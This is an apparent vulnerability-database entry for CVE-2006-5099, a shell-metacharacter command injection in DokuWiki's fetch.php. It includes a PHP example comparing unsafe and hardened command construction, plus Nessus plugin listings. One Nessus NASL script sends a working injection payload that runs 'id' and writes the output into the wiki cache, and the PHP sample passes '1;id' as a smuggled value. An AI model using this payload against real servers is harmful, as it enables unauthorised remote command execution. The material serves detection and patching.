CVE-2006-5099 - Remote Security vulnerability in Andreas Gohr Dokuwiki Release20060305/Release20060309/Release20060309E
Attack vector: NETWORK
Attack complexity: LOW
Privileges required: NONE
Confidentiality impact: PARTIAL
Integrity impact: PARTIAL
Availability impact: PARTIAL

Summary
lib/exec/fetch.php in DokuWiki before 2006-03-09e, when conf[imconvert] is configured to use ImageMagick, allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) w and (2) h parameters, which are not filtered when invoking convert.
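
The flaw class described in the summary, as an added example (not DokuWiki's code or its actual patch): a resize command built from raw `w`/`h` request values, next to a version that accepts only bounded decimal integers and quotes every argument. The function names, the `-resize` command layout and the 2000-pixel cap are assumptions made for illustration.

```php
<?php
// Added example, not DokuWiki code. Names and the cap below are assumptions.

const MAX_DIM = 2000; // assumed ceiling; also bounds CPU and disk cost per resize

/** Vulnerable pattern: request values are pasted into a shell command line. */
function build_resize_cmd_unsafe(string $convert, string $w, string $h, string $src, string $dst): string
{
    // A value such as "1;id" ends the convert command and starts another one.
    return "$convert -resize {$w}x{$h}! $src $dst";
}

/** Accept only a plain decimal integer between 1 and MAX_DIM. */
function parse_dim(string $raw): int
{
    // ctype_digit rejects "", signs, whitespace and every shell metacharacter;
    // the length check keeps very long digit strings away from the int cast.
    if (!ctype_digit($raw) || strlen($raw) > 5) {
        throw new InvalidArgumentException('dimension must be a decimal integer');
    }
    $n = (int) $raw;
    if ($n < 1 || $n > MAX_DIM) {
        throw new InvalidArgumentException('dimension out of range');
    }
    return $n;
}

/** Hardened pattern: validated integers, every argument shell-quoted. */
function build_resize_cmd_safe(string $convert, string $w, string $h, string $src, string $dst): string
{
    $geometry = parse_dim($w) . 'x' . parse_dim($h) . '!';
    return escapeshellarg($convert) . ' -resize ' . escapeshellarg($geometry)
        . ' ' . escapeshellarg($src) . ' ' . escapeshellarg($dst);
}

// Constructed inputs: one benign pair, one carrying a shell metacharacter.
foreach ([['128', '96'], ['1;id', '96']] as [$w, $h]) {
    echo 'unsafe: ', build_resize_cmd_unsafe('convert', $w, $h, 'in.png', 'out.png'), PHP_EOL;
    try {
        echo 'safe:   ', build_resize_cmd_safe('convert', $w, $h, 'in.png', 'out.png'), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo 'safe:   rejected (', $e->getMessage(), ')', PHP_EOL;
    }
}
```

Rejecting a malformed value outright, rather than trying to strip characters from it, keeps the check independent of which shell the web server user runs.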
Vulnerable Configurations
Part | Description | Count |
---|---|---|
Application | | 3 |
Nessus
NASL family: CGI abuses
NASL id: DOKUWIKI_FETCH_CMD_EXEC.NASL
description: The remote host is running DokuWiki, an open source wiki application written in PHP. The installed version of DokuWiki fails to properly sanitize input to the
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 22475
published: 2006-09-29
reporter: This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/22475
title: DokuWiki fetch.php Multiple Parameter imconvert Function Arbitrary Command Execution
code:

```
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(22475);
  script_version("1.20");
  script_cvs_date("Date: 2018/06/13 18:56:26");

  script_cve_id("CVE-2006-5098", "CVE-2006-5099");
  script_bugtraq_id(20257);

  script_name(english:"DokuWiki fetch.php Multiple Parameter imconvert Function Arbitrary Command Execution");
  script_summary(english:"Executes arbitrary command via DokuWiki im_convert Feature");

  script_set_attribute(attribute:"synopsis", value: "The remote web server contains a PHP script that is affected by multiple vulnerabilities." );
  script_set_attribute(attribute:"description", value: "The remote host is running DokuWiki, an open source wiki application written in PHP. The installed version of DokuWiki fails to properly sanitize input to the 'w' and 'h' parameters of the 'lib/exe/fetch.php' script before using it to execute a command when resizing images. An unauthenticated attacker can leverage this issue to execute arbitrary code on the remote host subject to the privileges of the web server user id. In addition, the application reportedly does not limit the size of images when resizing them, which can be exploited to churn through CPU cycles and disk space on the affected host. Note that successful exploitation of this issue requires that DokuWiki's 'imconvert' configuration option be set; by default, it is not." );
  script_set_attribute(attribute:"see_also", value:"http://bugs.splitbrain.org/?do=details&id=924");
  script_set_attribute(attribute:"see_also", value:"http://bugs.splitbrain.org/?do=details&id=926" );
  script_set_attribute(attribute:"see_also", value:"http://www.freelists.org/archives/dokuwiki/09-2006/msg00278.html" );
  script_set_attribute(attribute:"solution", value:"Upgrade to DokuWiki release 2006-03-09e / 2006-09-28 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2006/09/26");
  script_set_attribute(attribute:"plugin_publication_date", value:"2006/09/29");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:andreas_gohr:dokuwiki");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("dokuwiki_detect.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/dokuwiki");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
include("data_protection.inc");

port = get_http_port(default:80, php:1);

# Test an install.
i = get_install_from_kb(appname: "dokuwiki", port: port, exit_on_fail: 1);
dir = i['dir'];

# Try to exploit the flaw to run a command.
cmd = "id";
fname = string(SCRIPT_NAME, "-", unixtime(), ".html");

u = string(
  dir, "/lib/exe/fetch.php?",
  "media=wiki:dokuwiki-128.png&",
  "w=1;", cmd, ">../../data/cache/", fname, ";exit;"
);
r = http_send_recv3(port:port, method: "GET", item: u, exit_on_fail: 1);

# If it looks like the exploit was successful...
if (" bad permissions?" >< r[2])
{
  # Retrieve the output of the command.
  u = string(dir, "/data/cache/", fname);
  r = http_send_recv3(port: port, method: "GET", item: u, exit_on_fail: 1);

  # There's a problem if the output looks like it's from id.
  if (egrep(pattern:"uid=[0-9]+.*gid=[0-9]+.*", string: r[2]))
  {
    if (report_verbosity)
      report = strcat('\nNessus was able to execute the command \'', cmd, '\' on the remote host\n',
        'which produced the following output :\n\n',
        data_protection::sanitize_uid(output:r[2])
      );
    else report = NULL;

    security_hole(port:port, extra: report);
    exit(0);
  }
}
```

NASL family: Gentoo Local Security Checks
NASL id: GENTOO_GLSA-200609-20.NASL
description: The remote host is affected by the vulnerability described in GLSA-200609-20 (DokuWiki: Shell command injection and Denial of Service) Input validation flaws have been discovered in the image handling of fetch.php if ImageMagick is used, which is not the default method. Impact : A remote attacker could exploit the flaws to execute arbitrary shell commands with the rights of the web server daemon or cause a Denial of Service. Workaround : There is no known workaround at this time.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 22471
published: 2006-09-29
reporter: This script is Copyright (C) 2006-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/22471
title: GLSA-200609-20 : DokuWiki: Shell command injection and Denial of Service

NASL family: FreeBSD Local Security Checks
NASL id: FREEBSD_PKG_450B76EE506811DBA5AE00508D6A62DF.NASL
description: Secunia reports : Some vulnerabilities have been reported in DokuWiki, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise a vulnerable system. Input passed to the
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 22489
published: 2006-10-02
reporter: This script is Copyright (C) 2006-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/22489
title: FreeBSD : dokuwiki -- multiple vulnerabilities (450b76ee-5068-11db-a5ae-00508d6a62df)